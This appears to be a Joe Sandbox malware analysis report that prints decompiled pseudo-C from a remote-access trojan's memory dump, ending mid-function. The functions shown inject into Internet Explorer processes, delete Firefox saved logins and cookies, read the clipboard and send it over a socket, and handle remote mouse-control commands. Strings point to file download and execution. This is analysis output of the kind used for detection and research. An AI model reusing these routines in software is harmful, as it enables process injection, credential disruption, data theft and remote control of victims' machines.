                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                • API String ID: 1067849700-1507758755
                • Opcode ID: 42350e6d86979fa422e2aa9a3fe69452333fb00018cf03748f27ba608750ea0c
                • Instruction ID: bd0fccd32b98e4baecd5a91fc22e0c60ebb53a858293cf8cc6cedc8d782afcc2
                • Opcode Fuzzy Hash: 42350e6d86979fa422e2aa9a3fe69452333fb00018cf03748f27ba608750ea0c
                • Instruction Fuzzy Hash: 8D42A671A083005BC604FB76C9579AF77A9AF90308F40093FF542771E2EE7D9A49869B
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040E991 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 223processsynchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E0040E991(void* __eflags, char _a4) {
				char _v0;
				void* _v8;
				char _v24;
				short _v524;
				char _v528;
				char _v540;
				char _v1060;
				char _v1088;
				void* _v1092;
				char _v1108;
				void* _v1112;
				char _v1120;
				void* _v1124;
				char _v1132;
				char _v1136;
				char _v1164;
				char _v1172;
				char _v1176;
				char _v1184;
				char _v1188;
				char _v1192;
				char _v1196;
				char _v1197;
				char _v1200;
				char _v1201;
				char _v1208;
				void* _v1212;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t72;
				void* _t82;
				void* _t83;
				char _t84;
				intOrPtr* _t111;
				void* _t117;
				void* _t121;
				struct _SECURITY_ATTRIBUTES* _t135;
				void* _t197;
				void* _t205;
				void* _t211;
				void* _t212;

				_t135 = 0;
				GetModuleFileNameW(0,  &_v524, 0x104);
				_t193 = "1";
				if(E00406E3A("1") != 0) {
					L14:
					E00401EF3( &_a4, _t193, _t207, E0041A1E5( &_v1108, __eflags));
					E00401EE9();
					_t72 = E00410698( &_v528,  &_v0);
					__eflags = _t72;
					if(_t72 == 0) {
						goto L15;
					}
				} else {
					E00401F66(0,  &_v1196);
					_t211 = CreateToolhelp32Snapshot(2, 0);
					_v1088 = 0x22c;
					_push( &_v1088);
					Process32FirstW(_t211);
					while(Process32NextW(_t211,  &_v1092) != 0) {
						E0040415E(_t135,  &_v1184, _t193, _t211,  &_v1060);
						_t111 = E004022E5( &_v1188,  &_v1164);
						_t207 = E004022AA( &_v1192,  &_v1164);
						E00409291( &_v1164,  *((intOrPtr*)(E004022E5( &_v1196,  &_v1164))),  *_t113,  *_t111);
						_t212 = _t212 + 0xc;
						_t193 =  &_v24;
						_t117 = E0040AF46( &_v24);
						__eflags = _t117;
						if(_t117 != 0) {
							E00401EF3( &_v1208, _v1088, _t207, E0041AB76( &_v1120, _v1088));
							E00401EE9();
							_t121 = E00406E3A( &_v540);
							__eflags = _t121;
							if(_t121 == 0) {
								_t193 = 0x46a8f0;
								__eflags = E00406E3A(0x46a8f0);
								if(__eflags != 0) {
									L12:
									E00401EE9();
									L13:
									E00401EE9();
									goto L14;
								} else {
									__eflags = E0041AB40(_v1088);
									if(__eflags != 0) {
										goto L12;
									} else {
										E0040AEE6( &_v1208);
										E00401EE9();
										break;
									}
								}
							} else {
								E00401EE9();
								E00401EE9();
							}
						} else {
							E00401EE9();
							continue;
						}
						goto L22;
					}
					CloseHandle(_t211);
					_t193 = 0x46a8f0;
					if(E00406E3A(0x46a8f0) != 0) {
						goto L13;
					} else {
						E00401EE9();
						L15:
						_t205 = CreateMutexA(_t135, 1, E00401F8B(E00406292( &_v1108, 0x473268, _t211, "-I")));
						E00401FB8();
						E004020BF(_t135,  &_v1132);
						E00401EE4(0x473220);
						E0041ADFE( &_v1132);
						_t82 = E00401F8B( &_v1132);
						_t83 = E00401EE4( &_a4);
						_t197 = _t82;
						_t84 = E00417456(_t83);
						_v1197 = _t84;
						if(_t84 != 0) {
							L20:
							E00412B5F(0x473238, E00401F8B(0x473238), "Inj", 1);
							_t135 = _v1197;
						} else {
							E0040415E(_t135,  &_v1172, _t197, _t211, L"C:\\Program Files(x86)\\Internet Explorer\\");
							E00401F8B( &_v1136);
							_v1201 = E00417456(E00401EE4(E004087F0( &_v1200,  &_v1176, _t211, L"ieinstal.exe")));
							E00401EE9();
							if(_v1201 != _t135) {
								L19:
								E00401EE9();
								goto L20;
							} else {
								E00401F8B( &_v1132);
								_v1197 = E00417456(E00401EE4(E004087F0( &_v1196,  &_v1172, _t211, L"ielowutil.exe")));
								E00401EE9();
								if(_v1197 != _t135) {
									goto L19;
								} else {
									CloseHandle(_t205);
									E00401EE9();
								}
							}
						}
						E00401FB8();
					}
				}
				L22:
				E00401EE9();
				return _t135;
			}













































                0x0040e9a8
                0x0040e9ab
                0x0040e9b1
                0x0040e9c4
                0x0040eb4b
                0x0040eb5c
                0x0040eb65
                0x0040eb78
                0x0040eb7d
                0x0040eb7f
                0x00000000
                0x00000000
                0x0040e9ca
                0x0040e9ce
                0x0040e9dc
                0x0040e9de
                0x0040e9f0
                0x0040e9f2
                0x0040ea68
                0x0040ea06
                0x0040ea14
                0x0040ea29
                0x0040ea43
                0x0040ea48
                0x0040ea4b
                0x0040ea56
                0x0040ea5b
                0x0040ea5d
                0x0040eabf
                0x0040eac8
                0x0040ead8
                0x0040eadd
                0x0040eadf
                0x0040eaf8
                0x0040eb06
                0x0040eb08
                0x0040eb39
                0x0040eb3d
                0x0040eb46
                0x0040eb46
                0x00000000
                0x0040eb0a
                0x0040eb16
                0x0040eb18
                0x00000000
                0x0040eb1a
                0x0040eb26
                0x0040eb2f
                0x00000000
                0x0040eb2f
                0x0040eb18
                0x0040eae1
                0x0040eae5
                0x0040eaee
                0x0040eaee
                0x0040ea5f
                0x0040ea63
                0x00000000
                0x0040ea63
                0x00000000
                0x0040ea5d
                0x0040ea80
                0x0040ea86
                0x0040ea9a
                0x00000000
                0x0040eaa0
                0x0040eaa0
                0x0040eb85
                0x0040ebae
                0x0040ebb0
                0x0040ebb9
                0x0040ebc3
                0x0040ebce
                0x0040ebd7
                0x0040ebe5
                0x0040ebea
                0x0040ebee
                0x0040ebf3
                0x0040ebf9
                0x0040ecaa
                0x0040ecbd
                0x0040ecc2
                0x0040ebff
                0x0040ec08
                0x0040ec11
                0x0040ec3f
                0x0040ec43
                0x0040ec4c
                0x0040eca1
                0x0040eca5
                0x00000000
                0x0040ec4e
                0x0040ec52
                0x0040ec80
                0x0040ec84
                0x0040ec8d
                0x00000000
                0x0040ec8f
                0x0040ec90
                0x0040ec9a
                0x0040ec9a
                0x0040ec8d
                0x0040ec4c
                0x0040eccc
                0x0040eccc
                0x0040ea9a
                0x0040ecd1
                0x0040ecd8
                0x0040ece9

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00473298,?,00473280), ref: 0040E9AB
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E9D6
                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E9F2
                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040EA71
                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00473280), ref: 0040EA80
                  • Part of subcall function 0041AB76: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041AB8B
                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00473280), ref: 0040EBA4
                • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00473280), ref: 0040EC90
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                • String ID: 2G$82G$C:\Program Files(x86)\Internet Explorer\$Inj$h2G$ieinstal.exe$ielowutil.exe
                • API String ID: 193334293-656281143
                • Opcode ID: e4606b85d23d25fe3014d30d1567f5fa0e615b6128fa1654cfe03dd8b69724cf
                • Instruction ID: c6ac6d909184663fdd7a24f9be041a716c06b948c98e485a3872bbbcebe7606d
                • Opcode Fuzzy Hash: e4606b85d23d25fe3014d30d1567f5fa0e615b6128fa1654cfe03dd8b69724cf
                • Instruction Fuzzy Hash: F98141301093419BC754FB62D8919EEB7E4AFA0348F40483FF586631E2EF789949CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B0AA Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E0040B0AA(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t41;
				signed int _t55;
				signed int _t57;
				int _t71;
				int _t73;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t136;

				_t141 = __eflags;
				_t132 = __edi;
				_t86 = __ebx;
				E004020BF(__ebx,  &_v100);
				E004020BF(__ebx,  &_v76);
				E004020BF(__ebx,  &_v28);
				_t41 = E00402073(_t86,  &_v124, __edx, _t135, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FC2( &_v28, _t42, _t133, E004052DD(_t86,  &_v52, E0043A9AA(_t86, __eflags, "UserProfile"), _t135, _t141, _t41));
				E00401FB8();
				E00401FB8();
				_t128 =  &_v28;
				_t134 = FindFirstFileA(E00401F8B(E00406292( &_v124,  &_v28, _t135, "*")),  &_v468);
				E00401FB8();
				_t142 = _t134 - 0xffffffff;
				if(_t134 != 0xffffffff) {
					while(1) {
						__eflags = FindNextFileA(_t134,  &_v468);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) != 0) {
							_t55 = E0043E5D0( &(_v468.cFileName), ".");
							__eflags = _t55;
							if(_t55 != 0) {
								_t57 = E0043E5D0( &(_v468.cFileName), "..");
								__eflags = _t57;
								if(_t57 != 0) {
									E00401FC2( &_v100, _t59, _t134, E00408832(_t86,  &_v52, E00406292( &_v148,  &_v28, _t135,  &(_v468.cFileName)), _t132, _t135, __eflags, "\\logins.json"));
									E00401FB8();
									E00401FB8();
									_t128 = E00406292( &_v52,  &_v28, _t135,  &(_v468.cFileName));
									E00401FC2( &_v76, _t65, _t134, E00408832(_t86,  &_v148, _t65, _t132, _t135, __eflags, "\\key3.db"));
									E00401FB8();
									E00401FB8();
									_t71 = DeleteFileA(E00401F8B( &_v100));
									__eflags = _t71;
									if(_t71 == 0) {
										GetLastError();
									}
									_t73 = DeleteFileA(E00401F8B( &_v76));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
								}
							}
						}
					}
					E00402073(_t86, _t136 - 0x18, _t128, _t135, "\n[Firefox StoredLogins Cleared!]");
					E0040B752(_t86, _t128, _t135, __eflags);
					FindClose(_t134);
					goto L11;
				} else {
					FindClose(_t134);
					E00402073(_t86, _t136 - 0x18,  &_v28, _t135, "\n[Firefox StoredLogins not found]");
					E0040B752(_t86,  &_v28, _t135, _t142);
					L11:
					E00401FB8();
					E00401FB8();
					E00401FB8();
					return 1;
				}
			}






















                0x0040b0aa
                0x0040b0aa
                0x0040b0aa
                0x0040b0b7
                0x0040b0bf
                0x0040b0c7
                0x0040b0d4
                0x0040b0f4
                0x0040b0fc
                0x0040b104
                0x0040b115
                0x0040b132
                0x0040b134
                0x0040b139
                0x0040b13c
                0x0040b25e
                0x0040b26c
                0x0040b26e
                0x00000000
                0x00000000
                0x0040b165
                0x0040b16c
                0x0040b17e
                0x0040b185
                0x0040b187
                0x0040b199
                0x0040b1a0
                0x0040b1a2
                0x0040b1d2
                0x0040b1da
                0x0040b1e5
                0x0040b202
                0x0040b214
                0x0040b21f
                0x0040b227
                0x0040b235
                0x0040b23b
                0x0040b23d
                0x0040b23f
                0x0040b23f
                0x0040b24e
                0x0040b254
                0x0040b256
                0x0040b258
                0x0040b258
                0x0040b256
                0x0040b1a2
                0x0040b187
                0x0040b16c
                0x0040b27e
                0x0040b283
                0x0040b28c
                0x00000000
                0x0040b142
                0x0040b143
                0x0040b153
                0x0040b158
                0x0040b292
                0x0040b295
                0x0040b29d
                0x0040b2a5
                0x0040b2b0
                0x0040b2b0

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B129
                • FindClose.KERNEL32(00000000), ref: 0040B143
                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B266
                • FindClose.KERNEL32(00000000), ref: 0040B28C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$CloseFile$FirstNext
                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                • API String ID: 1164774033-3681987949
                • Opcode ID: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                • Instruction ID: 4dbca2b9aa89f5e628085f7deb87cc68ab42e838c00934cc31fa014136c7fd8a
                • Opcode Fuzzy Hash: 073a4d63a48226157dde18ccb65b455a12d9a39e5646febe62d80ed98aa8a538
                • Instruction Fuzzy Hash: E2512C3191421A5ADB14FBA1EC5AEEEB768AF50304F5001BFF406720E2EF785A458A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00415802 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83clipboardmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00415802(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a24, char _a28, void* _a152, void* _a176) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					E00401E45( &_a16, _t55, __ebp, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E0040245C() + 2);
					_t20 = GlobalLock(_t57);
					E00401E45( &_a12, _t55, __ebp, _t68, _t38);
					_t22 = E0040245C();
					E004351E0(_t20, E00401F8B(E00401E45( &_a8, _t55, __ebp, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x46a8f0;
						E0040415E(_t38,  &_a28, _t55, __ebp,  !=  ? _t31 : 0x46a8f0);
						_t55 =  &_a24;
						E0041A879(_t38, _t66 - 0x18,  &_a24);
						_push(0x6b);
						E00404A81(0x4734e8,  &_a24, _t31);
						E00401EE9();
					}
				}
				E00401E6D( &_a16, _t55);
				E00401FB8();
				E00401FB8();
				return 0;
			}













                0x00415802
                0x00415803
                0x00415809
                0x0041580b
                0x00415811
                0x0041581c
                0x00415837
                0x0041583a
                0x00415847
                0x0041584e
                0x00415867
                0x0041586c
                0x00415870
                0x00415879
                0x00415896
                0x004158a5
                0x004158b3
                0x004158b6
                0x004158bf
                0x004158c5
                0x004158d2
                0x004158da
                0x004158e2
                0x004158e8
                0x004158ed
                0x004158f4
                0x00415c96
                0x00415c96
                0x004158a5
                0x0041611c
                0x00416128
                0x00416134
                0x00416141

                APIs
                • OpenClipboard.USER32 ref: 00415803
                • EmptyClipboard.USER32 ref: 00415811
                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00415831
                • GlobalLock.KERNEL32 ref: 0041583A
                • GlobalUnlock.KERNEL32(00000000), ref: 00415870
                • SetClipboardData.USER32 ref: 00415879
                • CloseClipboard.USER32 ref: 00415896
                • OpenClipboard.USER32 ref: 0041589D
                • GetClipboardData.USER32 ref: 004158AD
                • GlobalLock.KERNEL32 ref: 004158B6
                • GlobalUnlock.KERNEL32(00000000), ref: 004158BF
                • CloseClipboard.USER32 ref: 004158C5
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                • String ID: 4G
                • API String ID: 3520204547-3080958808
                • Opcode ID: ef08b53fe7de490e2c8f90236c35185acbcab73e7cd3014ef6914643d045bdcc
                • Instruction ID: f1afe3415f062d0b9b587beb2e8851fc1ee6a0bc4f4e9a56709fcddcee62baf9
                • Opcode Fuzzy Hash: ef08b53fe7de490e2c8f90236c35185acbcab73e7cd3014ef6914643d045bdcc
                • Instruction Fuzzy Hash: EF2158715083005BC714BF71EC5AAAE76A9AF90756F00483EFD06962E3EF38C905C66A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B2B1 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E0040B2B1(void* __edx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t30;
				signed int _t44;
				signed int _t46;
				long _t60;
				void* _t68;
				void* _t69;
				void* _t98;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;

				_t112 = __eflags;
				_t103 = __edi;
				E004020BF(_t68,  &_v52);
				E004020BF(_t68,  &_v28);
				_t30 = E00402073(_t68,  &_v100, __edx, _t106, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FC2( &_v28, _t31, _t104, E004052DD(_t68,  &_v76, E0043A9AA(_t68, __eflags, "UserProfile"), _t106, _t112, _t30));
				E00401FB8();
				E00401FB8();
				_t101 =  &_v28;
				_t105 = FindFirstFileA(E00401F8B(E00406292( &_v100,  &_v28, _t106, "*")),  &_v444);
				E00401FB8();
				_t113 = _t105 - 0xffffffff;
				if(_t105 != 0xffffffff) {
					while(1) {
						__eflags = FindNextFileA(_t105,  &_v444);
						if(__eflags == 0) {
							break;
						}
						__eflags = _v444.dwFileAttributes & 0x00000010;
						if((_v444.dwFileAttributes & 0x00000010) == 0) {
							continue;
						} else {
							_t44 = E0043E5D0( &(_v444.cFileName), ".");
							__eflags = _t44;
							if(_t44 == 0) {
								continue;
							} else {
								_t46 = E0043E5D0( &(_v444.cFileName), "..");
								__eflags = _t46;
								if(_t46 == 0) {
									continue;
								} else {
									_t101 = E00406292( &_v124,  &_v28, _t106,  &(_v444.cFileName));
									E00401FC2( &_v52, _t48, _t105, E00408832(_t68,  &_v76, _t48, _t103, _t106, __eflags, "\\cookies.sqlite"));
									E00401FB8();
									E00401FB8();
									__eflags = DeleteFileA(E00401F8B( &_v52));
									if(__eflags != 0) {
										_t98 = _t107 - 0x18;
										_push("\n[Firefox cookies found, cleared!]");
										goto L2;
									} else {
										_t60 = GetLastError();
										__eflags = _t60 != 0;
										if(_t60 != 0) {
											FindClose(_t105);
											_t69 = 0;
										} else {
											continue;
										}
									}
								}
							}
						}
						goto L11;
					}
					E00402073(_t68, _t107 - 0x18, _t101, _t106, "\n[Firefox Cookies not found]");
					E0040B752(_t68, _t101, _t106, __eflags);
					FindClose(_t105);
					goto L10;
				} else {
					FindClose(_t105);
					_t98 = _t107 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402073(_t68, _t98, _t101, _t106);
					E0040B752(_t68, _t101, _t106, _t113);
					L10:
					_t69 = 1;
				}
				L11:
				E00401FB8();
				E00401FB8();
				return _t69;
			}
























                0x0040b2b1
                0x0040b2b1
                0x0040b2bf
                0x0040b2c7
                0x0040b2d4
                0x0040b2f4
                0x0040b2fc
                0x0040b304
                0x0040b315
                0x0040b332
                0x0040b334
                0x0040b339
                0x0040b33c
                0x0040b3fb
                0x0040b409
                0x0040b40b
                0x00000000
                0x00000000
                0x0040b365
                0x0040b36c
                0x00000000
                0x0040b372
                0x0040b37e
                0x0040b385
                0x0040b387
                0x00000000
                0x0040b389
                0x0040b395
                0x0040b39c
                0x0040b39e
                0x00000000
                0x0040b3a0
                0x0040b3b8
                0x0040b3c7
                0x0040b3cf
                0x0040b3d7
                0x0040b3eb
                0x0040b3ed
                0x0040b457
                0x0040b459
                0x00000000
                0x0040b3ef
                0x0040b3ef
                0x0040b3f6
                0x0040b3f9
                0x0040b44a
                0x0040b450
                0x00000000
                0x00000000
                0x00000000
                0x0040b3f9
                0x0040b3ed
                0x0040b39e
                0x0040b387
                0x00000000
                0x0040b36c
                0x0040b41b
                0x0040b420
                0x0040b429
                0x00000000
                0x0040b342
                0x0040b343
                0x0040b34c
                0x0040b34e
                0x0040b353
                0x0040b353
                0x0040b358
                0x0040b42f
                0x0040b42f
                0x0040b42f
                0x0040b431
                0x0040b434
                0x0040b43c
                0x0040b448

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B329
                • FindClose.KERNEL32(00000000), ref: 0040B343
                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B403
                • FindClose.KERNEL32(00000000), ref: 0040B429
                • FindClose.KERNEL32(00000000), ref: 0040B44A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$Close$File$FirstNext
                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                • API String ID: 3527384056-432212279
                • Opcode ID: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                • Instruction ID: 51cc95074229e97af50e91e82164566f02eb9ff2f5b37e3c54f7b0a52fa2c995
                • Opcode Fuzzy Hash: 6e259262706716e35cf83066339bf0dd6887841de27ae9bc6657e2767c2a9b71
                • Instruction Fuzzy Hash: 4D416C3194420A6ACB14FBA5DC56DEEB768AE51304F50017FF405B21D2FF389A45CA9E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00418186 Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 204COMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E00418186(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				char _v52;
				signed char* _t61;
				char* _t62;
				signed char* _t63;
				intOrPtr* _t73;
				intOrPtr* _t80;
				char* _t87;
				char* _t88;
				char* _t89;
				intOrPtr* _t90;
				signed char* _t92;
				char* _t93;
				intOrPtr _t95;
				signed int _t105;
				void* _t108;
				signed int _t148;

				_t95 =  *((intOrPtr*)(E004051C3(0)));
				E00404182( &_a8,  &_v32, 1, 0xffffffff);
				if(_t95 != 0x30) {
					__eflags = _t95 - 0x31;
					if(_t95 != 0x31) {
						__eflags = _t95 - 0x32;
						if(_t95 != 0x32) {
							__eflags = _t95 - 0x33;
							if(_t95 != 0x33) {
								__eflags = _t95 - 0x34;
								if(_t95 != 0x34) {
									__eflags = _t95 - 0x35;
									if(_t95 != 0x35) {
										__eflags = _t95 - 0x36;
										if(_t95 != 0x36) {
											__eflags = _t95 - 0x37;
											if(_t95 == 0x37) {
												_t61 = E004051C3(2);
												_t62 = E004051C3(1);
												_t63 = E004051C3(0);
												_t105 =  *_t61 & 0x000000ff;
												__eflags =  *_t62;
												_push(_t105);
												_t52 =  *_t62 != 0;
												__eflags = _t52;
												_push((_t105 & 0xffffff00 | _t52) & 0x000000ff);
												_t108 = 0x4736e8;
												goto L18;
											}
										} else {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004051C3(0)));
									_v40 =  *((intOrPtr*)(E004051C3(4)));
									E00418009( *((intOrPtr*)(E004051C3(8))),  &_v48,  &_v44);
									E004184AD(_v48, _v44);
								}
							} else {
								_t73 = E004051C3(0);
								_v44 =  *((intOrPtr*)(E004051C3(4)));
								_v44 =  *((intOrPtr*)(E004051C3(8)));
								E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v52,  &_v48);
								E0041844A( *_t73, _v52, _v48);
								goto L8;
							}
						} else {
							_t80 = E004051C3(0);
							_v40 =  *((intOrPtr*)(E004051C3(4)));
							_v48 =  *((intOrPtr*)(E004051C3(8)));
							E00418009( *((intOrPtr*)(E004051C3(0xc))),  &_v48,  &_v52);
							E004183E7( *_t80, _v48, _v52);
							goto L8;
						}
					} else {
						_t87 = E004051C3(4);
						_t88 = E004051C3(3);
						_t89 = E004051C3(2);
						_t90 = E004051C3(0);
						 *_t87 =  *_t88;
						__eflags =  *_t89;
						E004184EE( *_t90, __edx & 0xffffff00 |  *_t89 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0 |  *_t88 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t87 != 0x00000000) & 0x000000ff);
						L8:
					}
				} else {
					_t92 = E004051C3(2);
					_t93 = E004051C3(1);
					_t63 = E004051C3(0);
					_t148 =  *_t92 & 0x000000ff;
					_t177 =  *_t93;
					_push(_t148);
					_push((_t148 & 0xffffff00 |  *_t93 != 0x00000000) & 0x000000ff);
					_t108 = 0x473630;
					L18:
					_push( *_t63 & 0x000000ff);
					E00417825(_t108, _t177);
				}
				E00401FB8();
				E00401FB8();
				return 0;
			}

























                0x004181a4
                0x004181ab
                0x004181b3
                0x004181f2
                0x004181f5
                0x00418251
                0x00418254
                0x004182b1
                0x004182b4
                0x00418315
                0x00418318
                0x00418366
                0x00418369
                0x00418370
                0x00418373
                0x00418387
                0x0041838a
                0x00418392
                0x0041839f
                0x004183ac
                0x004183b1
                0x004183b4
                0x004183b7
                0x004183b8
                0x004183b8
                0x004183be
                0x004183bf
                0x00000000
                0x004183bf
                0x00418375
                0x00418375
                0x00418376
                0x00000000
                0x00418376
                0x0041836b
                0x0041836b
                0x0041836c
                0x00418378
                0x0041837f
                0x0041837f
                0x0041831a
                0x0041832c
                0x0041833d
                0x00418351
                0x0041835f
                0x0041835f
                0x004182b6
                0x004182bb
                0x004182d1
                0x004182e6
                0x004182fa
                0x0041830a
                0x00000000
                0x0041830a
                0x00418256
                0x0041825b
                0x00418271
                0x00418286
                0x0041829a
                0x004182aa
                0x00000000
                0x004182aa
                0x004181f7
                0x004181fd
                0x0041820a
                0x00418217
                0x00418224
                0x0041822f
                0x00418239
                0x00418246
                0x0041830f
                0x0041830f
                0x004181b5
                0x004181bb
                0x004181c8
                0x004181d5
                0x004181da
                0x004181dd
                0x004181e0
                0x004181e7
                0x004181e8
                0x004183c4
                0x004183c7
                0x004183c8
                0x004183c8
                0x004183d1
                0x004183d9
                0x004183e6

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 0$06G$1$2$3$4$5$6$7$6G
                • API String ID: 0-3439518097
                • Opcode ID: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                • Instruction ID: 33774567b1f725210584e6ae4599f2175015db0efea207338ba601142af93ff7
                • Opcode Fuzzy Hash: 24ac2fc32beb33ce48cafe5b80d71fdfa07178e887ebd5d7dc0c99c1ba21e080
                • Instruction Fuzzy Hash: 3461C4709183019FD304EF21D861FAB7BA49F94710F14881FF9A26B2D1DF399A49CB66
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004131DA Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 485registrylibraryloaderCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 81%
                			E004131DA(void* __edx, void* __eflags, char _a8) {
				char _v36;
				char _v48;
				char _v52;
				void* _v60;
				char _v68;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				struct _SECURITY_ATTRIBUTES _v112;
				void* _v120;
				char _v128;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t75;
				void* _t86;
				void* _t97;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t111;
				void* _t118;
				void* _t119;
				void* _t121;
				void* _t125;
				void* _t130;
				void* _t136;
				void* _t140;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t168;
				void* _t174;
				void* _t176;
				void* _t177;
				void* _t179;
